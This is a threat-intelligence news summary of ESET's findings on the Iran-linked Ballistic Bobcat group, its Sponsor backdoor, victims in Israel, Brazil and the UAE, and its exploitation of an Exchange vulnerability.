ESET researchers have uncovered a new campaign called Ballistic Bobcat, which is targeting entities in Brazil, Israel, and the United Arab Emirates. The campaign uses a previously unknown backdoor called Sponsor, which was discovered after analyzing a sample found on a victim’s system in Israel in May 2022. This backdoor is being deployed by the advanced persistent threat (APT) group known as Ballistic Bobcat, which is suspected to have ties to Iran.
Ballistic Bobcat, also known as APT35/APT42 or Charming Kitten, has a history of targeting education, government, healthcare organizations, as well as human rights activists and journalists. The group is most active in Israel, the Middle East, and the United States. During the pandemic, they focused on targeting COVID-19-related organizations, including the World Health Organization and Gilead Pharmaceuticals.
The Ballistic Bobcat campaign using the Sponsor backdoor is characterized by narrowly targeted campaigns of limited duration. ESET researchers have discovered a total of four other versions of the backdoor. In total, at least 34 victims in Brazil, Israel, and the United Arab Emirates have been identified.
The campaign begins with the exploitation of known vulnerabilities in internet-exposed Microsoft Exchange servers. Ballistic Bobcat conducts meticulous scans of these systems to identify weaknesses and subsequently targets and exploits them. It should be noted that many of the victims identified in ESET telemetry were likely victims of opportunity rather than preselected targets. This suggests that other threat actors may also have access to these systems.
The Sponsor backdoor uses configuration files stored on disk, which are discreetly deployed by innocuous-looking batch files. This allows the backdoor to evade detection by scanning engines. Ballistic Bobcat has used this modular approach with modest success over the past two and a half years. In addition to the Sponsor backdoor, the group also utilizes various open-source tools on compromised systems.
The majority of the victims in this campaign are located in Israel, with only two victims in other countries: Brazil and the United Arab Emirates. The victims in Israel come from a wide range of sectors, including automotive, communications, engineering, financial services, healthcare, insurance, law, manufacturing, retail, technology, telecommunications, and unidentified organizations.
ESET researchers have also uncovered indicators of compromise that link the Ballistic Bobcat campaign to previous attacks on an Israeli victim that operates an insurance marketplace. The tools used in these attacks communicated with the same command and control server as reported in a previous alert from the Cybersecurity and Infrastructure Security Agency (CISA).
To gain initial access to the systems, Ballistic Bobcat likely exploited a known vulnerability, CVE-2021-26855, in Microsoft Exchange servers. This vulnerability has been a popular target for various threat actors. During the Sponsoring Access campaign, Ballistic Bobcat also utilized a number of open-source tools, including host2ip, RevSocks, Mimikatz, GOST, Chisel, Plink, WebBrowserPassView, sqlextractor, and procdump.
The discovery of the Ballistic Bobcat campaign and the Sponsor backdoor highlights the ongoing threat posed by APT groups and their continued efforts to target organizations. It also reinforces the importance of proactive cybersecurity measures, such as promptly patching vulnerabilities and implementing strong security practices, to mitigate the risk of falling victim to these attacks.